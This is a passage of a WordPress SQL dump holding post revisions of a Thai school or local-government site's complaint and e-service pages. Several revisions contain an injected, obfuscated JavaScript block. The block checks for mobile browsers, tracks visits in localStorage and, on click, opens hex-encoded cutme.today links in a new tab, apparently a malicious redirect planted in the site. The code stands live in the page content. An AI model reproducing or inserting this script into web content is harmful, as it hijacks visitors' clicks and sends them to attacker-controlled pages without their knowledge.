_0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ช่องทางการร้องเรียนเรื่องทั่วไป','','inherit','closed','closed','','484-revision-v1','','','2025-07-03 14:57:12','2025-07-03 07:57:12','',484,'http://pakhaeng.ssk.in.th/?p=1671',0,'revision','',0),
(1672,1,'2025-07-03 14:58:57','2025-07-03 07:58:57','<!-- wp:image {\"id\":1620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" class=\"wp-image-1614\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\" width=\"100%\" height=\"600\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n\n</p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2025-07-03 14:58:57','2025-07-03 07:58:57','',459,'http://pakhaeng.ssk.in.th/?p=1672',0,'revision','',0),
(1673,1,'2025-07-03 15:04:32','2025-07-03 08:04:32','<!-- wp:image {\"id\":1509,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353-1.png\" alt=\"\" class=\"wp-image-1509\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\" \nheight=\"500\" width=\"100%\"></iframe>\n<!-- /wp:html -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ช่องทางการร้องเรียนเรื่องทั่วไป','','inherit','closed','closed','','484-revision-v1','','','2025-07-03 15:04:32','2025-07-03 08:04:32','',484,'http://pakhaeng.ssk.in.th/?p=1673',0,'revision','',0),
(1675,1,'2025-07-03 15:12:54','2025-07-03 08:12:54','<!-- wp:image {\"id\":1509,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353-1.png\" alt=\"\" class=\"wp-image-1509\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\" width=\"100%\" height=\"600\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const 